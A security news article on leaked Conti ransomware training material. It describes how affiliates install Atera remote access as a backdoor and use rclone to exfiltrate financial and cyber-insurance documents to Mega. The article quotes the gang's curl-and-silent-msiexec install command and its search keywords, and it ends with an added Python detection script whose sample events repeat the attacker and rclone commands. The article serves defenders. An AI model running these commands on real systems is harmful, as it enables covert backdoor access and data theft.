Training material used by Conti ransomware affiliates was leaked online this month, allowing an inside look at how the attackers abuse legitimate software and hunt for cyber insurance policies.
Earlier this month, a disgruntled affiliate posted to a hacking forum the IP addresses of Cobalt Strike C2 servers used by the gang and a 113 MB archive containing training material for conducting ransomware attacks.
Using this leaked training material, security researchers, network admins, and incident responders can better respond to attacks and quickly find common indicators of compromise (IOCs) used by the ransomware gang.
That is exactly the case with new research released by Advanced Intel's CEO Vitali Kremez, which illustrates how actual Conti attacks follow the leaked playbook.
Legitimate remote access software used as a backdoor
An interesting tactic used by the ransomware gang is deploying the legitimate Atera remote access software as a backdoor for continued persistence.
When conducting an attack, ransomware operations commonly deploy Cobalt Strike beacons that the attackers use to execute commands remotely and maintain access to a network.
However, security software has become more adept at detecting Cobalt Strike beacons, which can cost the threat actors their access.
To hedge against this, Kremez states that the Conti gang installs the legitimate Atera remote access software on compromised systems, which security software is unlikely to flag because it is a commercially distributed administration tool.
Atera is a remote management service where you deploy agents to your endpoints in order to manage them all from a single console. By deploying agents to every compromised device on a network, the Conti threat actors gain remote access to any device from a single platform, independent of the beacon.
Kremez states that they have seen the following command (issued through the Cobalt Strike beacon's shell command, which runs it via cmd.exe) used by Conti affiliates to install Atera on a compromised device:
shell curl -o setup.msi "http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=REDACTED%40protonmail.com" && msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1
"In most of the cases, the adversaries leveraged protonmail[.]com and outlook[.]com email accounts to register with Atera to receive an agent installation script and console access," explained Kremez in a blog post about Conti using Atera.
Kremez advises admins to use application whitelisting tools to block or audit command-line tools such as 'curl' in order to detect this activity.
"Audit and/or block command-line interpreters by using whitelisting tools, like AppLocker or Software Restriction Policies with the focus on any suspicious "curl" command and unauthorized ".msi" installer scripts particularly those from C:\ProgramData and C:\Temp directory," advises Kremez.
Conti targets insurance, banking data
One of the leaked documents, titled 'CobaltStrike MANUAL_V2 .docx', details the specific steps an affiliate should follow when conducting a Conti ransomware attack.
After the first stage of the attack, which is to breach the network, gather credentials, and gain control of the Windows domain, the threat actors tell their affiliates to start exfiltrating data from the compromised network.
This stage is critical for the attackers: the files are not only used to scare victims into paying a ransom, but stolen accounting and insurance policy documents are also used to set the initial ransom demand and to conduct negotiations.
When first exfiltrating data from the victim's servers, the Conti ransomware gang specifically looks for documents related to the company's financials and for evidence of whether it holds a cyber insurance policy.
"search by keywords. need accounting reports. bank statements. for 20-21 years. all fresh. especially important, cyber insurance, security policy documents," reads the translated Conti training document.
In particular, the threat actors search for the following keywords as part of their first data exfiltration steps:
cyber, policy, insurance, endorsement, supplementary, underwriting, terms, bank, 2020, 2021, Statement
The ransomware gang tells the affiliates to "prepares datapack right away" and immediately upload the data to Mega, the cloud storage service they use as a hosting platform for the exfiltrated data.
Kremez said that the attackers use the legitimate 'rclone' program to upload the data directly to the Mega cloud storage service.
"Rclone config is created and an external location (MEGA in this case) for data synchronization (data cloning) is established. The needed network shares are assigned within the rclone.conf on the victim's network and a command is executed," explains Kremez in a blog post.
Kremez states that defenders should focus on any rclone.exe command run from the C:\ProgramData and C:\Temp directories to detect data exfiltration attempts.
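As an added example (not code from the article or from Advanced Intel), the following Python detection logic implements the two checks Kremez recommends above over constructed process-creation events: the curl download and silent msiexec install of an Atera agent, and rclone.exe run from C:\ProgramData or C:\Temp or configured to push data to a named remote. The event field names, the rule names, the sample command lines (with "example" standing in for the redacted Atera subdomain and "user" for the redacted mailbox) and the share and remote names are assumptions for illustration; real telemetry would come from Sysmon Event ID 1 or Security event 4688.

```python
"""Detection rules for the Conti tradecraft described above (added example).
Matches (1) curl fetching an Atera agent MSI and msiexec installing it silently,
and (2) rclone.exe staged in C:\\ProgramData or C:\\Temp or syncing to a remote.
All events, field names and rule names are constructed for illustration."""
import re
from dataclasses import dataclass

# Staging directories Kremez singles out for the dropped .msi and for rclone.exe.
STAGING_DIRS = ("c:\\programdata", "c:\\temp")

# Patterns derived from the single command quoted in the article (assumptions).
ATERA_AGENT_URL = re.compile(r"servicedesk\.atera\.com/GetAgent/", re.I)
CURL_MSI_OUT = re.compile(r"\s-o\s+\"?[^\"\s]+\.msi\b", re.I)
MSIEXEC_INSTALL = re.compile(r"/i\s+\"?([^\"\s]+\.msi)\"?", re.I)
MSIEXEC_QUIET = re.compile(r"\s/q[nb]?\b", re.I)
RCLONE_XFER = re.compile(r"\b(copy|sync|move|copyto|moveto)\b\s+\S+\s+(\w+):", re.I)
RCLONE_CONFIG = re.compile(r"--config\s+\"?([^\"\s]+)", re.I)


@dataclass(frozen=True)
class ProcEvent:
    """Subset of a Windows process-creation record (Sysmon EID 1 / Security 4688)."""
    image: str
    command_line: str
    parent_image: str
    current_directory: str = ""


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def resolve(path: str, cwd: str) -> str:
    """Make a relative path absolute against the process working directory."""
    path = path.strip('"')
    if ":" in path[:3] or path.startswith("\\\\"):
        return path
    return cwd.rstrip("\\") + "\\" + path


def in_staging_dir(path: str) -> bool:
    p = path.strip('"').lower()
    return any(p.startswith(d + "\\") for d in STAGING_DIRS)


def detect(ev: ProcEvent) -> list:
    """Return the names of every rule the event trips (empty list means clean)."""
    hits = []
    name = basename(ev.image)
    cl = ev.command_line

    # Stage 1: Atera agent fetched with curl. The GetAgent URL is high confidence;
    # any curl writing an .msi is only medium confidence (curl ships with Windows).
    if name == "curl.exe":
        if ATERA_AGENT_URL.search(cl):
            hits.append("curl_atera_agent_download")
        elif CURL_MSI_OUT.search(cl):
            hits.append("curl_msi_download")

    # Stage 2: silent msiexec install. IntegratorLogin is an Atera-specific MSI
    # property; a quiet install of an MSI sitting in a staging dir is the generic case.
    if name == "msiexec.exe":
        if "integratorlogin=" in cl.lower():
            hits.append("msiexec_atera_integrator_install")
        m = MSIEXEC_INSTALL.search(cl)
        if m and MSIEXEC_QUIET.search(cl) and in_staging_dir(resolve(m.group(1), ev.current_directory)):
            hits.append("msiexec_quiet_install_from_staging_dir")

    # Exfiltration: rclone binary or rclone.conf in a staging dir, or a transfer to a remote.
    if name == "rclone.exe":
        if in_staging_dir(ev.image):
            hits.append("rclone_from_staging_dir")
        m = RCLONE_XFER.search(cl)
        if m:
            hits.append(f"rclone_transfer_to_remote:{m.group(2).lower()}")
        c = RCLONE_CONFIG.search(cl)
        if c and in_staging_dir(resolve(c.group(1), ev.current_directory)):
            hits.append("rclone_config_in_staging_dir")
    return hits


def scan(events: list) -> list:
    """Return (index, hits) for every event that trips at least one rule."""
    return [(i, h) for i, ev in enumerate(events) if (h := detect(ev))]


# Constructed sample events: "example" replaces the redacted Atera subdomain,
# "user" the redacted mailbox; the share, remote and deployment paths are invented.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\curl.exe",
              'curl -o setup.msi "http://example.servicedesk.atera.com/GetAgent/Msi/'
              '?customerId=1&integratorLogin=user%40protonmail.com"',
              r"C:\Windows\System32\cmd.exe", r"C:\ProgramData"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              "msiexec /i setup.msi /qn IntegratorLogin=user@protonmail.com CompanyId=1",
              r"C:\Windows\System32\cmd.exe", r"C:\ProgramData"),
    ProcEvent(r"C:\ProgramData\rclone.exe",
              r'rclone.exe copy "\\FILESRV01\Finance" mega:datapack --config C:\ProgramData\rclone.conf -q',
              r"C:\Windows\System32\cmd.exe", r"C:\ProgramData"),
    # Benign control: interactive, non-quiet install from a vetted deployment share.
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r'msiexec /i "\\deploy\packages\7zip.msi"',
              r"C:\Windows\explorer.exe", r"C:\Users\admin"),
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(f"event {i}: {basename(SAMPLE_EVENTS[i].image)} -> {hits}")
```

The msiexec rule resolves the relative `setup.msi` against the recorded working directory, because the command quoted in the article never names the full path; without the current-directory field the "from C:\ProgramData or C:\Temp" condition cannot be evaluated. The generic curl-to-.msi and quiet-install rules will fire on legitimate software deployment, so treat them as hunting leads and reserve alerting for the Atera GetAgent URL, the IntegratorLogin property, and rclone.exe executing from a staging directory.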